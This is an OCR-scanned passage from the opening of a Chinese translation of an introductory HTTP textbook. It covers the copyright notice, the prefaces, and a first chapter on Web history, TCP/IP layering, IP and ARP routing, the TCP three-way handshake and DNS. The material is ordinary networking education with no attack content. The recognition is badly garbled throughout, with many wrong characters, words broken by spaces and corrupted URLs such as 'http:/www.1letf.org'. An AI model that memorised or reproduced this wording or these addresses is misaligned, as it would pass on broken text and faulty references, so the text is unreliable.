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但 您 购买 的 电子 书 仅 供 您 个 人 使 
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我 们 愿意 相信 读者 具有 这 样 的 民 
和 和 冤 情 ， 与 我 们 共同 保护 知识 
产权 。 


如 果 购 买 者 有 侵权 行为 ， 我 们 可 
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究 法 律 贡 任 。 
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内 容 提 要 

本 书 对 互联 网 基 盘 一 一 HTTP 协议 进行 了 全 面 系统 的 介绍 。 作 者 由 HTTP 协 议 的 发 
展 历史 九 九 道 来 , 严谨 细致 地 剖析 了 HTTP 协 议 的 结构 , 列举 诸多 常见 通信 场景 及 实战 
案例 , 最 后 延伸 到 Web 安全 、 最 狐 拉 术 动 回 等 方面 。 本 书 的 特色 为 在 讲解 的 同时 , 辅 以 
大 量 生 动 形 象 的 通信 图 例 , 更 好 地 帮助 读者 深刻 理解 HITP 通 信 过 程 中 客户 端 与 服务 
器 之 间 的 交互 情况 。 读 者 可 通过 本 书 快 速 了 解 并 和 擎 握 HTTP 协 议 的 基础 , 前 端 工 程 师 分 
析 抓 包 数 据 , 后 端 工 程 师 实现 REST API、 实 现 自 己 的 HITP 服 务 器 等 过 程 中 所 需 的 
HTTP 相关 知识 点 本 书 均 有 介绍 。 

本 书 适合 Web 开发 工程 师 , 以 及 对 HTTP 协 议 感 兴趣 的 各 层次 读者 。 
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译 者 序 





目前 ， 国 内 讲解 HTTP 协议 的 书 实在 太 少 了 。 

在 我 的 印象 中 ， 讲 解 网 络 协议 的 书 仅 有 两 本 。 一 本 是 《HTTP 权威 
8 南 》， 但 其 厚度 令 人 望 而 生 鞭 ; 男 一 本 是 《TCP/IP 详解 ， 卷 1》， 内 容 
艰深 难 懂 ， 学 习 难 度 较 大 。 这 两 本 书 都 是 被 读者 们 奉 为 “圣经 ”的 经 典 
之 作 ， 大 师 们 的 授 道 自然 无 可 挑剔 ,但 关键 是 它们 对 初学 者 都 不 那么 友 
好 ， 大 家 的 学 习 信 心 很 容易 受到 打击 ， 阅 读 中 途 或 将 束之高阁 。 本 书 的 
出 现 及 时 缓解 了 该 问题 。 

HTTP 协议 本 身 并 不 复杂 ， 理 解 起 来 也 不 会 花费 太 多 学 习 成 本 ， 但 
纯 概 念 式 的 学 习 稍 显 单调 。 前 端 工程 师 也 许 对 各 种 具有 炫 酷 效果 的 页 面 
的 实现 技巧 、 赏 心 悦 目 的 UI 框架 更 感 兴趣 ， 但 因此 和 党 党 忽视 了 HTTP 
协议 这 部 分 基础 内 容 。 实 际 上 ， 如 果 想 要 在 专业 技术 道路 上 走 得 更 坚 
实 ， 绝 对 不 能 绕 开 学 习 HITP 协议 这 一 环节 。 对 基础 及 核心 部 分 的 深入 
学 习 是 成 为 一 名 专业 技术 人 员 的 前 提 ， 以 不 变 应 万 变 才 是 立足 之 本 。 

我 在 学 习 Web 开发 的 过 程 中 ， 曾 接触 到 编写 网 络 爬 虫 程 序 、 分 析 
抓 包 数 据 、 实 现 HITP 服务 右 、 提 供 网 站 REST API、 修 改 后 端 定制 框 
架 等 方面 ， 它 们 无 一 例外 ， 都 会 用 到 HTTP 协议 的 各 方面 知识 ， 并 且 某 
些 细 节 无 法 通过 查阅 资料 立即 领会 到 ， 还 需 依靠 扎实 的 基础 及 平日 里 的 


口 


本 书 作者 的 写作 手法 平实 易 履 ， 内 容 讲 解 透彻 到 位 。 前 半 部 分 由 
HTTP 的 成 长 发 展 史 娓 九 道 来 ， 基 于 HTTP 1.1 标准 讲解 通信 过 程 ， 包 
括 HTTP 方法 、 协 议 格式 、 报 文 结 构 、 首 部 字段 、 状 态 码 等 的 具体 含 
义 ， 还 分 别 讲解 HTTP 通信 过 程 中 代理 、 网 关 、 隧 道 等 的 作用 。 接 着 介 
绍 SPDY、WebSocket、WebDAV 等 HTTP 的 扩展 功能 。 作 者 还 从 细节 
方面 举例 ， 让 读者 更 好 地 理解 何 为 无 状态 ( stateless )、301 和 302 重 定 
问 的 区 别 在 哪 、 缓 存 机制 ， 等 等 。 本 书后 半 部 分 的 重心 放 在 Web 安全 
上 ,涵盖 HTTPS、SSL、 证 书 认 证 、 加 密 机 制 、Web 攻击 手段 等 内 容 。 
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旧 在 让 读者 对 HITP 协议 形成 一 个 整体 概念 ， 明 确 设计 HTTP 的 目的 及 
意义 所 在 ， 了 解 HITP 的 工作 机 制 ， 擎 握 报 文 中 稼 用 的 首部 字段 ， 返 回 
结 末 状态 码 的 作用 ， 对 各 种 客户 端 与 服务 融 的 通信 交互 场景 的 细 克 等 都 
做 到 了 然 于 心 ， 从 而 在 平时 的 开发 工作 中 独立 思考 ， 迅 速 准 确 地 定位 分 
析 由 HTTP 引发 的 问题 ， 并 辅 以 适当 的 方法 加 以 解决 。 

本 书 图 文 并 成 ， 大 量 图 片 穿插 文中 ， 生 动 形 象 地 问讯 者 介绍 每 一 个 
应 用 案例 ， 减 少 了 读者 阅读 时 的 枯燥 感 。 借 助 一 张 张 配 图 ， 读 者 们 不 仪 
会 加 深 视 范 记 忆 ， 在 轻松 愉悦 的 氛围 中 ， 还 可 以 更 深刻 地 理解 通信 机 制 
等 背后 的 工作 原理 。 正 所 请 一 图 胜 千 文 。 

在 本 书 即 将 付 梓 之 际 ， 感 谢 EMC 首席 工程 师 高 博学 长 、IBM 工程 
师 李 亚 舟 (Fleuria )、 豆 办 运 维 工程 师 钱 龙 、 全 栈 工 程 师 纱 思 源 
( Aveline Swan ) 以 及 姜 莹 等 好 友 。 他 们 在 繁重 的 工作 之 余 ， 牺 牲 个 人 朵 
暇 时 间 ， 峙 心地 帮 我 扫 清 技术 疑点 ， 修 正 翻 译 芷 漏 ， 在 此 说 表示 衷心 的 
感谢 。 

最 后 视 大 家 阅读 愉快 ! 
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本 书 的 上 一 版 是 2004 年 出 版 的 《今夜 生 办 己 HTTP》( 中 文 译名 : 
今 晚 我 们 一 起 和 学习 HTTP， 翔 注 社 )。 和 当时 一 样 ， 现 在 互联 网 的 主流 
仍 是 Web， 但 人 们 对 Web 的 要 求 却 不 断 地 发 生变 化 。Google 在 2005 年 
推出 了 地 图 服务 Google Maps， 很 多 人 看 到 这 一 Web 应 用 程序 的 界面 后 
感到 十 分 震惊 。 因 为 在 此 之 前 ， 我 们 只 能 信 助 加 面 应 用 程序 或 Flash 等 
方式 ， 实 现 流畅 滚动 及 视角 放大 纵 小 等 功能 ， 如 今 这 些 功 能 仅 雳 一 个 
Web 浏览 硕 驶 能 呈现 了 。 也 许 正 是 由 于 Google Maps 的 出 现 ， 人 们 对 
Web 的 要 求 才 开 始 变 得 多 了 起 来 。 发 送 请 求 、 等 待 啊 应 ， 这 些 HITP 中 
稀 松 平津 的 功能 已 经 无 法 满足 人 们 的 需求 了 。 于 是 ，Web 不 再 保留 在 
HTTP/1.1 版 本 ， 在 保持 HTTP 简洁 的 同时 ， 也 开始 开发 新 的 功能 。 我 
之 所 以 要 撰写 《今夜 本 办 名 HTTP》 一 书 ， 是 因为 我 发 现 多 数 Web 应 用 
程序 开发 者 并 不 了 解 文 撑 Web 基础 的 HTTP 协议 。 我 坚信 通过 学 习 协 
以 ， 大 家 能 更 深刻 地 理解 Web 开发 。 即 使 是 在 本 书 撰写 完成 后 的 今天 ， 
我 的 这 一 想法 仍 未 改变 ， 肯 定 还 有 很 多 开发 者 尚未 了 解 HTTP 协议 。 

对 HTTP 协议 有 了 更 深入 的 理解 后 ， 也 许 你 会 从 中 得 到 一 些 启发 。 
不 再 关于 HTTP/1.1 版 本 的 制约 ， 你 也 能 开发 出 Google Maps 那样 的 应 
用 程序 。 

本 书 不 仅 面 癌 Web 应 用 程序 的 开发 者 ， 还 面 回 使 用 Web 的 软件 开 
发 者 、Web 风险 评 佑 的 安全 工程 师 、 前 端 工程 师 以 及 Web 使 用 者 等 与 
Web 相关 的 所 有 读者 ,希望 这 本 书 能 对 大 家 有 所 帮助 。 
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2013 年 1 月 吉日 
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第 1 章 
了 解 Web 及 网 络 基 础 


本 章 概述 了 Web 是 建立 在 何 种 技术 之 上 ， 以 及 HTTP 协 议 是 如 何 诞 
生 并 发 展 的 。 我 们 从 其 背景 着 手 ， 来 深入 了 解 这 部 分 内 容 。 
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上 


1.1 使 用 HTTP 协议 访问 Web 
你 知道 当 我 们 在 网 页 浏览 闫 (Web browser ) 的 地 址 栏 中 输入 URL 
时 ，Web 页 面 是 如 何 呈 现 的 吗 ? 


当 在 浏览 器 的 地 址 栏 内 输入 URL 时 , 可 以 看 到 Web 页 面 
当然 ， 即 使 你 不 了 解 其 运作 原理 ， 也 能 看 到 Web 页 面 








在 浏览 器 地 址 栏 内 输入 URL 之 后 , 信息 会 被 送 往 某 处 


然后 从 某 处 获得 的 回复 ， 内 容 就 会 显示 在 Web 页 面 上 


Books 
Event/Learnireg 
002 Media 





Web 页 面 当 然 不 能 邢 空 显示 出 来 。 根 据 Web 浏览 硕 地 址 栏 中 指定 
的 URL，Web 浏览 硕 从 Web 服务 硕 端 获取 文件 资源 (resource ) 等 信 
县 ， 从 而 显示 出 Web 页 面 。 

像 这 种 通过 发 送 请 求 获 取 服 务 右 资源 的 Web 浏览 硕 等 ， 都 可 称 为 
客户 症 (client )。 











通过 指定 的 访问 地 址 获取 ( 或 上 传 ) 服 务 器 
资源 ( 文件 等 信息 ) 


ER 


使 用 HTTP 协 议 的 通信 





Web 使 用 一 种 名 为 HTTP ( HyperText Transfer Protocol， 超 文本 传输 
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第 1 章 了 解 Web 及 网 络 基 础 








协议 ”) 的 协议 作为 规范 ， 完 成 从 客户 端 到 服务 器 端 等 一 系列 运作 流程 。 
而 协议 是 指 规则 的 约定 。 可 以 说 ，Web 是 建立 在 HTTP 协议 上 通信 的 。 


1.2 HTTP 的 诞生 


在 深入 学 习 HTTP 之 前 ， 我 们 先 来 介绍 一 下 HTTP 诞生 的 背景 。 了 
解 背景 的 同时 也 能 了 解 当 初 制定 HTTP 的 初 袁 ， 这 样 有 助 于 我 们 更 好 地 
理解 。 





1.2.1 ”为 知识 共享 而 规划 Web 
1989 年 3 月 ， 互 联网 还 只 属于 少数 人 。 在 这 一 互联 网 的 黎明 期 ， 
HTTP 让 牛 了 。 


003 





WWW 这 一 提议 是 致力 于 全 世界 的 研究 者 们 进行 知识 共享 。 


QQ) HTTP 通 常 被 译 为 超 文 本 传输 协议 ,但 这 种 译 法 并 不 严谨 。 严 谨 的 译名 应 该 
为 “ 超 文 本 转移 协议 ”。 但 是 前 一 译 法 已 约定 俗 成 ， 本 书 将 会 沿用 。 有 兴趣 
的 读者 可 参考 图 灵 社 区 的 相关 讨论 : http://wwwi.ituring.com.cn/article/1817。 

译 者 注 
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加 三 因 加 
EEC rr 
CERN (欧洲 核子 研究 组 织 ) 的 带 姆 。 们 纳 斯 - 李 (Tm Berners- 
Lee ) 博士 提出 了 一 种 能 让 远 隔 两 地 的 人 研究 者 们 共享 知识 的 设想 。 
最 初 设想 的 基本 理念 是 : 借助 多 文档 之 间 相 互 关 联 形 成 的 超 文 本 
( HyperText )， 连 成 可 相互 参阅 的 WWW( World Wide Web， 万 维 网 )。 
现在 已 提出 了 3 项 WWW 构建 技术 , 分别 是 : 把 SGML ( Standard 
Generalized Markup Language， 标 准 通用 标记 语言 ) 作为 页 面 的 文本 标 
记 语 言 的 HTML ( HyperText Markup Laneuage， 超 文本 标记 语言 ); 作 
为 文档 传递 协议 的 HTTP ; 指定 文档 所 在 地 址 的 URL ( Uniform Resource 
Locator， 统 一 资源 定位 符 )。 
WWW 这 一 名 称 ， 是 Web 训 览 融 当 年 用 来 浏览 超 文 本 的 客户 桨 应 
用 程序 时 的 名 称 。 现 在 则 用 来 表示 这 一 系列 的 集合 ， 也 可 人 简称 为 Web。 


1.2.2 Web 成 长 时 代 
1990 年 11 月 ，CERN 成 功 研 发 了 世界 上 第 一 台 Web 服务 絮 和 Web 
浏览 器。 两 年 后 的 1992 年 9 月 , 日 本 第 一 个 网 站 的 主页 上 线 了 。 


e 日 本 第 一 个 主页 
http:/www.ibarakiken.gr.Jjp/Www/ 














1990 年 ， 大 家 针对 HTML 1.0 草案 进行 了 讨论 ， 因 HTML 1.0 中 存 
在 多 处 模糊 不 清 的 部 分 ， 草案 被 下 接 废弃 了 。 
e@ HTML1.0 
http:/www.w3.org/MarkUp/draft-letf-lllr-htmjl-01.txt 





1993 年 1 月 ， 现 代 浏 览 大 的 祖先 NCSA ( National Center for Supercomputer 
Applications ， 美 家 超级 计算 机 应 用 中 心 ) 研发 的 Mosaic 问世 了 。 
它 以 in-line (内 联 ) 等 形式 显示 HTML 的 图 像 ， 在 图 像 方面 出 色 的 表现 
使 它 迅速 在 世界 范围 内 流行 开 来 。 

同年 秋天 ，Mosaic 的 Windows 版 和 Macintosh 版 面世 。 使 用 CGI 技 
术 的 NCSA Web 服务 器 、NCSA HTTPd 1.0 也 差不多 是 在 这 个 时 期 出 现 的 。 
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® NCSA Mosaic bounce page 


http://archive.ncsa.illinois.edu/mosaic.html 


e The NCSA HTTPd Home Page ( 存档 ) 
http://web.archive.org/web/20090426182129/http://hoohoo.ncsa. 
illinois.edu/( 原址 已 失效 ) 


1994 年 的 12 月， 网 景 通信 公司 发 布 了 Netscape Navigator 1.0， 
1995 年 微软 公司 发 布 Internet Explorer 1.0 和 2.0。 

紧 随 其 后 的 是 现在 已 然 成 为 Web 服务 器 标准 之 一 的 Apache， 当 时 
它 以 Apache 0.2 的 姿态 出 现在 世人 眼前。 而 HTML 也 发 布 了 2.0 版 本 。 
那 一 年 ，Web 技术 的 发 展 突 飞 猛 进 。 

时 光 流 转 ， 从 1995 年 左右 起 ,微软 公司 与 网 景 通信 公司 之 间 爆 发 
的 浏览 各 大 战 愈演愈烈 。 两 家 公司 部 各 目 对 HTML 做 了 扩展 ， 于 是 导 
致 在 写 HTML 页 面 时 ， 必 须 考虑 兼容 他 们 两 家 公司 的 浏览 入。 时 至 今 
日 ， 这 个 问题 仍 令 那 些 瑟 前 问 页 面 的 工程 师 感到 荐 手 。 

在 这 场 浏 览 癌 供应 商 之 间 的 苋 争 中 ， 他 们 不 仅 对 当时 发 展 中 的 各 种 
Web 标准 化 视而不见 ， 还 屡次 出 现 新 增 功能 没有 对 应 说 明文 档 的 情况 。 

2000 年 前 后 ， 这 场 浏览 各 战争 随 看 网 景 通信 公司 的 有 娶 洲 而 暂 告 一 
段落 。 但 就 在 2004 年 ，Mozilla 基金 会 发 布 了 Firefox 浏览 右 ， 第 二 次 
浏 览 硕 大 成 随即 爆发 。 

Internet Explorer 浏 贤 大 的 版 本 从 6 升 到 7 醒 后 花费 了 5 年 时 间 。 之 
后 接连 不 断 地 发 布 了 8、9、10 版 本 。 男 外 ，Chrome、Opera、Safari 等 
浏 览 硕 也 纷纷 抢占 市 场 份额 。 








1.2.3 ”驻足 不 前 的 HTTP 


HTTP/0.9 
HTTP 于 1990 年 问世 。 那 时 的 HITP 并 没有 作为 正式 的 标准 被 建立 。 
现在 的 HITP 其 实 含 有 HTTP1.0 之 前 版 本 的 意思 ， 因 此 被 称 为 HTTP/0.9。 
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HTTP/1.0 

HTTP 正式 作为 标准 被 公布 是 在 1996 年 的 5 月 ， 版 本 被 命名 为 
HTTP/1.0， 并 记载 于 RFC1945。 虽 说 是 初期 标准 ， 但 该 协议 标准 至 今 仍 
被 广泛 使 用 在 服务 从 闪 。 

e RFC1945 - Hypertext Transfer Protocol -- HTTP/1.0 

http:/www.1letf.org/rfc/rfc1945.txt 





HTTP/1.1 
1997 年 1 月 公布 的 HTTP/1.1 是 目前 主流 的 HTTP 协议 版 本 。 当 初 
的 标准 是 RFC2068， 之 后 发 布 的 修订 版 RFC2616 就 是 当前 的 最 新 版 本 。 
® RFC2616 - Hypertext Transfer Protocol -- HTTP/1.1 
http:/www.1letf.org/rfc/rfc2616.txt 


可 见 ， 作 为 Web 文档 传输 协议 的 HITP， 它 的 版 本 几乎 没有 更 新 。 新 一 
代 HTTP/2.0 正在 制订 中 ， 但 要 达到 较 高 的 使 用 覆盖 率 ， 仍 需 假 以 时 日 。 

当年 HTTP 协议 的 出 现 主要 是 为 了 解决 文本 传输 的 难题 。 由 于 协议 本 
身 非 常人 简单 ， 于 是 在 此 基础 上 设想 了 很 多 应 用 方法 并 投入 了 实际 使 用 。 现 
在 HTTP 协议 已 经 超出 了 Web 这 个 框架 的 局 限 ， 被 运用 到 了 各 种 场景 














1.3 ”网 络 基础 TCP/IP 


为 了 理解 HTTP， 我 们 有 必要 事先 了 解 一 下 TCP/IP 协议 族 。 

通常 使 用 的 网 络 (包括 互联 网 ) 是 在 TCP/IP 协议 族 的 基础 上 运作 
的 。 而 HTTP 属于 它 内 部 的 一 个 子 集 。 

接 下 来 ， 我 们 仅 介绍 理解 HTTP 所 需 掌握 的 TCP/P 协议 族 的 概要 。 知 
想 进 一 步 学 习 有 关 TCP/P 的 知识 ， 请 参考 其 他 讲解 TCP/P 的 专业 书籍 。 





1.3.1 TCP/IP 协议 族 
计算 机 与 网 络 设备 要 相互 通信 ， 双 方 就 必须 基于 相同 的 方法 。 比 
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如 ， 如 何 探 测 到 通信 目标 、 由 哪 一 边 先 发 起 通信 、 使 用 哪 种 语言 进行 通 
信 、 怎 样 结 束 通信 等 规则 都 需要 事先 确定 。 不 同 的 硬件 、 操 作 系 统 之 间 
的 通信 ， 所 有 的 这 一 切 都 需要 一 种 规则 。 而 我 们 就 把 这 种 规则 称 为 协议 
( protocol )。 








IEEE.8022 





ICMP 


图 : TCP/IP 是 互联 网 相关 的 各 类 协议 族 的 总 称 


协议 中 存在 各 式 各 样 的 内 容 。 从 电 绕 的 规格 到 IP 地 址 的 选 定 方法 、 
寻找 异地 用 户 的 方法 、 双 方 建立 通信 的 顺序 ， 以 及 Web 页 面 显 示 和 需要 
处 理 的 步骤 ， 等 等 。 

像 这 样 把 与 互联 网 相关 联 的 协议 集合 起 来 总 称 为 TCP/IP。 也 有 说 
法 认为 ，TCP/IP 是 指 TCP 和 IP 这 两 种 协议 。 还 有 一 种 说 法 认为 ，TCP/ 
IP 是 在 IP 协议 的 通信 过 程 中 ,使 用 到 的 协议 族 的 统称 。 





1.3.2 TCP/IP 的 分 层 管理 

TCP/IP 协议 族 里 重要 的 一 点 就 是 分 层 。TCP/IP 协议 族 按 层 次 分 别 
分 为 以 下 4 层 : 应 用 层 、 传 输 层 、 网 络 层 和 数据 链 路 层 。 

把 TCP/IP 层次 化 是 有 好 处 的 。 比 如 ， 如 果 互 联网 只 由 一 个 协议 统 
筹 ， 某 个 地 方 需 要 改变 设计 时 ， 就 必须 把 所 有 部 分 整体 蔡 换 掉 。 而 分 层 
之 后 只 需 把 变动 的 层 蔡 换 抒 即 可 。 把 各 层 之 间 的 接口 部 分 规划 好 之 后 ， 
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国 加 同 
nn 
每 个 层次 内 部 的 设计 就 能 够 自由 改动 了 。 

值得 一 提 的 是 ， 层 次 化 之 后 ， 设 计 也 变 得 相对 简单 了 。 处 于 应 用 层 
上 的 应 用 可 以 只 考虑 分 派 给 自己 的 任务 ， 而 不 需要 弄 清 对 方 在 地 球 上 哪 
个 地 方 、 对 方 的 传输 路 线 是 怎样 的 、 是 否 能 确保 传输 送 达 等 问题 。 

TCP/IP 协议 族 各 层 的 作用 如 下 。 























用 层 

应 用 层 决定 了 癌 用 户 提供 应 用 服务 时 通信 的 活动 。 

TCP/IP 协议 族 内 预存 了 各 类 通用 的 应 用 服务 。 比 如 ,，FTP (File 
Transfer Protocol， 文 件 传 输 协 议 ) 和 DNS (Domain Name System ， 
域名 系统 ) 服务 就 是 其 中 两 类 。 














HTTP 协议 也 处 于 该 层 。 

传输 层 

传输 层 对 上 层 应 用 层 ， 提 供 处 于 网 络 连接 中 的 两 台 计 算 机 之 间 的 
数据 传输 。 


在 传输 层 有 两 个 性 质 不 同 的 协议 : TCP (Transmission Control 
Protocol， 传 输 欣 制 协议 ) 和 UDP ( User Data Protocol， 用 户 数 据 
报 协议 )。 


网 络 层 ( 又 名 网 络 互 连 层 ) 

网 络 层 用 来 人 处理 在 网 络 上 流动 的 数据 包 。 数 据 包 是 网 络 传 输 的 最 小 
数据 单位 。 该 层 规定 了 通过 怎样 的 路 径 〈 所 谓 的 传输 路 线 ) 到 达 对 
方 计算 机 ， 并 把 数据 包 传 送 给 对 方 。 

与 对 方 计 算 机 之 间 通 过 多 台 计 算 机 或 网 络 设备 进行 传输 时 ， 网 络 层 
所 起 的 作用 就 是 在 众多 的 选项 内 选择 一 条 传输 路 线 。 








链 路 层 ( 又 名 数据 链 路 层 ， 网 络 接口 层 ) 
用 来 处 理 连 接 网 络 的 人 硬件 部 分 。 包 括 控 制 操 作 系 统 、 便 件 的 设备 驱 
动 、NIC ( Network Interface Card， 网 络 适 配 胡 ， 即 网 卡 )， 及 光纤 
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等 物理 可 见 部 分 (还 包括 连接 页 等 一 切 传 输 媒 介 )。 人 硬件 上 的 范畴 
均 在 链 路 层 的 作用 范围 之 内 。 


1.3.3 TCP/IP 通信 传输 流 


客户 端 服务 器 
应 用 层 HTTP HTTP 
局 on 服务 器 
传输 层 TCP TCP 
网 络 层 PP IP | 
链 路 层 网 络 网 络 























利用 TCP/IP 协议 族 进行 网 络 通信 和 时， 会 通过 分 层 顺 序 与 对 方 进行 
通信 。 发 送 端 从 应 用 层 往 下 走 ， 接 收 端 则 往 应 用 层 往 上 走 。 

我 们 用 HITP 举例 来 说 明 ， 首 先 作为 发 送 端 的 客户 端 在 应 用 层 
(HTTP 协议 ) 发 出 一 个 想 看 某 个 Web 页面 的 HITP 请 求 。 

接着 ， 为 了 传输 方便 ， 在 传输 层 (TCP 协议 ) 把 从 应 用 层 处 收 到 的 
数据 (HTTP 请 求 报 文 ) 进行 分 制 ， 并 在 各 个 报 文 上 打上 标记 序号 及 端 
口号 后 转发 给 网 络 层 。 

在 网 络 层 ( IP 协议 )， 增 加 作为 通信 目的 地 的 MAC 地 址 后 转发 给 
链 路 层 。 这 样 一 来 ， 发 往 网 络 的 通信 请 求 就 准备 齐全 了 。 

接收 并 的 服务 器 在 链 路 层 接收 到 数据 ， 按 序 往 上 层 发 送 ， 一 直到 应 
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用 层 。 当 传输 到 应 用 层 ， 才 能 算 真 正 接 收 到 由 客户 端 发 送 过 来 的 HTTP 














请 求 。 
发 送 端 接收 端 
每 通过 一 层 则 每 通过 一 层 则 
增加 首部 删除 首部 
HTTP 报 文 
应 用 层 HTTP 数 据 HTTP 数据 | 
TCP 首 部 
ms 
IP 数 据 包 个 
IP 首 部 IP 首 部 
网 络 层 
终 架 松 
网 络 架 构 
IP 首 部 lB 
链 路 层 ; 





发 送 问 在 层 与 层 之 间 传 输 数据 时 ， 每 经 过 一 层 时 必定 会 被 打上 一 个 
该 层 所 属 的 自 部 信息 。 反 之 ， 接 收 问 在 层 与 层 传输 数据 时 ， 每 经 过 一 层 
时 会 把 对 应 的 首部 消去 。 

这 种 把 数据 信息 包装 起 来 的 做 法 称 为 封装 〈encapsulate )。 











1.4 与 HTTP 关系 密切 的 协议 : IP、TCP 和 DNS 


下 面 我 们 分 别针 对 在 TCP/P 协议 族 中 与 HTTP 密 不 可 分 的 3 个 协议 
( IP、TCP 和 DNS ) 进行 说 明 。 
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1.4.1 负责 传输 的 IP 协议 

按 层 次 分 ， 卫 (Internet Protocol ) 网 际 协议 位 于 网 络 层 。Internet 
Protocol 这 个 名 称 可 能 听 起 来 有 点 伪 张 ， 但 事实 正 是 如 此 ， 因 为 几乎 所 
有 使 用 网 络 的 系统 都 会 用 到 IP 协议 。TCP/IP 协议 族 中 的 IP 指 的 就 是 网 
味 协 议 ， 协 议 名 称 中 占据 了 一 半 位 置 ， 其 重要 性 可 见 一 斑 。 可 能 有 人 会 
把 “IP” 和 “IP 地 址 ” 搞 混 ,“IP” 其 实 是 一 种 协议 的 名 称 。 

PP 协议 的 作用 是 把 各 种 数据 包 传 送 给 对 方 。 而 要 保证 确实 传送 到 对 
方 那 里 ， 则 知 要 满足 各 类 条 件 。 其 中 两 个 重要 的 条 件 是 IP 地 址 和 MAC 
地 址 ( Media Access Control Address )。 

PP 地 址 指明 了 市 点 被 分 配 到 的 地 址 ，MAC 地 址 是 指 网 卡 所 属 的 
定 地 址 。IP 地 址 可 以 和 MAC 地 址 进行 配对 。IP 地 址 可 变换 , 但 MAC 
地 址 基本 上 不 会 更 改 。 








使 用 ARP 协议 凭借 MAC 地 址 进行 通信 3 
IP 间 的 通信 依赖 MAC 在 网 络 上 ， 通 信 的 双方 在 同一 局 域 网 

(LAN ) 内 的 情况 是 很 少 的 ， 通 常 是 经 过 多 台 计 算 机 和 网 络 设备 中 转 才 

能 连接 到 对 方 。 而 在 进行 中 fy 会 利用 下 一 站 中 转 设 备 的 MAC 地 址 

来 搜索 下 一 个 中 转 目 标 。 这 时 ， 会 采用 ARP 协议 ( Address Resolution 

Protocol )。ARP 是 一 种 用 以 解析 地 址 的 协议 ， 根 据 通 信 方 的 IP 地址 就 

可 以 反 查 出 对 应 的 MAC 地 址 。 


没有 人 能 够 全 面 掌 握 互 联网 中 的 传输 状况 

在 到 达 通 信 目 标本 的 中 转 过 程 中 ， 那 些 计算 机 和 路 由 右 等 网 络 设备 
只 能 获悉 很 粗略 的 传输 路 线 。 

这 种 机 制 称 为 路 由 选择 (routing )， 有 点 像 快递 公司 的 送 贷 过 程 。 
想 要 寄 快 递 的 人 ， 只 要 将 目 己 的 贷 物 送 到 集散 中 心 ， 就 可 以 知道 快递 公 
司 是 否 肯 收 件 发 货 ， 该 快递 公司 的 集散 中 心 检查 赁 物 的 送 达 地 址 ， 明 确 
下 站 该 送 往 哪个 区 域 的 集散 中 心 。 接 着 ， 那 个 区 域 的 集散 中 心目 会 判断 
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是 否 能 送 到 对 方 的 家 中 。 
我 们 是 想 通 过 这 个 比喻 说 明 ， 无 论 哪 台 计 算 机 、 哪 台 网 络 设备 ， 它 
们 都 无 法 全 面 千 握 互联 网 中 的 细 市 。 







想 往 IP 地 址 为 192.0.43.10 的 
地 方 发 送 数据 昌 


(使 用 ARP 协议 解析 后 但 未 解析 > 
总 之 先 发 送 给 
00-XX-C6-6B-XX-XX 吧 






中 一 一 转 ! 
下 一 站 是 00-XX-B5-A5-XX-XX ! 


| MAC 地址 
发 送 端 00-XX-C6-6B-XX-XX 





012 






中 一 一 转 ! 
下 一 站 的 o0-XX-A6-6B-XX-XX 
就 是 目的 地 3 了/ 


路 由 器 
MAC 地址 
00-XX-B5-A5-XX-XX 


IP 地 址 ， 192.0.43.10 
MAC 地 址 ;00-XX-A6-6B-XX-XX 接收 端 





1.4.2 ”确保 可 靠 性 的 TCP 协议 

按 层次 分 ，TCP 位 于 传输 层 ， 提 供 可 笔 的 字 节 流 服务 。 

所 谓 的 字 节 流 服务 ( Byte Stream Service ) 是 指 ， 为 了 方便 传输 ， 
将 大 块 数据 分 割 成 以 报 文 段 (segment ) 为 单位 的 数据 包 进 行 管理 。 而 
可 靠 的 传输 服务 是 指 ， 能 够 把 数据 准确 可 靠 地 传 给 对 方 。 一 言 以 蔽 之 ， 
TCP 协议 为 了 更 容易 传送 大 数据 才 把 数据 分 割 ， 而 且 TCP 协议 能 够 确 
认 数 据 最 终 是 否 送 达到 对 方 。 
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确保 数据 能 到 达 目 标 

为 了 准确 无 误 地 将 数据 送 达 目 标 处 ，TCP 协议 采用 了 三 次 握手 
(three-way handshaking ) 策略 。 用 TCP 协议 把 数据 包 送 出 去 后 ，TCP 
不 会 对 传送 后 的 情况 置之不理 ， 它 一 定 会 回 对 方 确认 是 否 成 功 送 达 。 握 
手 过 程 中 使 用 了 TCP 的 标志 ( flag ) 一 一 SYN ( synchronize ) 和 ACK 
( acknowledgement )。 

发 送 问 首先 发 送 一 个 带 SYN 标志 的 数据 包 给 对 方 。 接 收 问 收 到 后 ， 
回 传 一 个 带 有 SYN/ACK 标志 的 数据 包 以 示 传 a 上 乱 。 最 后 ， 发 送 
端 再 回 传 一 个 市 ACK 标志 的 数据 包 ， 代表“ 握手 ” 

右 在 握手 过 程 中 某 个 阶段 莫名 中 断 ，TCP 协议 会 再 次 以 相同 的 顺序 
发 送 相同 的 数据 包 。 


三 次 握手 
013 








一 二 ~， 
dy 





除了 上 述 三 次 握手 ，TCP 协议 还 有 其 他 各 种 手段 来 保证 通信 的 可 
恩人 性 。 


1.5 负责 域名 解析 的 DNS 服务 


DNS ( Domain Name System ) 服务 是 和 HITP 协议 一 样 位 于 应 用 层 
的 协议 。 它 提供 域名 到 IP 地 址 之 间 的 解析 服务 。 
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计算 机 既 可 以 被 赋予 IP 地 址 ， 也 可 以 被 赋予 主机 名 和 域名 。 比 如 
Www.hackr.jp。 

用 户 通常 使 用 主机 名 或 域名 来 访问 对 方 的 计算 机 ， 而 不 是 直接 通过 
IP 地 址 访问 。 因 为 与 IP 地 址 的 一 组 纯 数字 相 比 ， 用 字母 配合 数字 的 表 
示 形 式 来 指定 计算 机 名 更 符合 人 类 的 记忆 习惯 。 

但 要 让 计算 机 去 理解 名 称 ， 相 对 而 言 就 变 得 困难 了 。 因 为 计算 机 更 
擅长 处 理 一 长 串 数 字 。 

为 了 解决 上 述 的 问题 ，DNS 服务 应 运 而 生 。DNS 协议 提供 通过 域 
名 查找 IP 地 址 ， 或 逆 癌 从 IP 地 址 反 查 域名 的 服务 。 
















我 想 访 问 hackr.jp 网 砚 …… 


O 
把 它 的 IP 地 址 告诉 我 吧 (Cal( 9 

S A \ 

二 3 


DNS 
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hackr.jp 对 应 的 IP 地 址 
虹 20X.189.105.112 


IP 地 址 
20X.189.105.112 


向 20X.189.105.112 发 送 访问 请 求 





hackr.jp 的 
VVeb 服务器 


1.6 ”各 种 协议 与 HTTP 协议 的 关系 


学 习 了 和 HTTP 协议 密 不 可 分 的 TCP/IP 协议 族 中 的 各 种 协议 后 ， 
